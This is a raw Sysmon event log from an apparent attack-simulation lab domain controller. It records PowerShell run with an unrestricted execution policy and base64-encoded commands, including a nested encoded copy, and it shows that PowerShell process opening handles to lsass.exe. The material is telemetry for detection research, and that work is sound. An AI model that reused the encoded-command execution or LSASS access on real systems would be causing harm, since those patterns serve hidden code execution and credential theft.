65001C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.512{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.512{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.465{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pwxbp1jp.tav.ps12021-01-14 13:08:47.465 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.449{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.418{08A6967A-425F-6000-DC02-000000009901}41842732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1f2516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c693120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c692df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1446d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c653987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c6b1e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c6954bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c6954bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c69534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c6872d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c693804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c6933f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c693120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c692df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1446d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c679c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c679222(wow64) 154100x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.429{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBB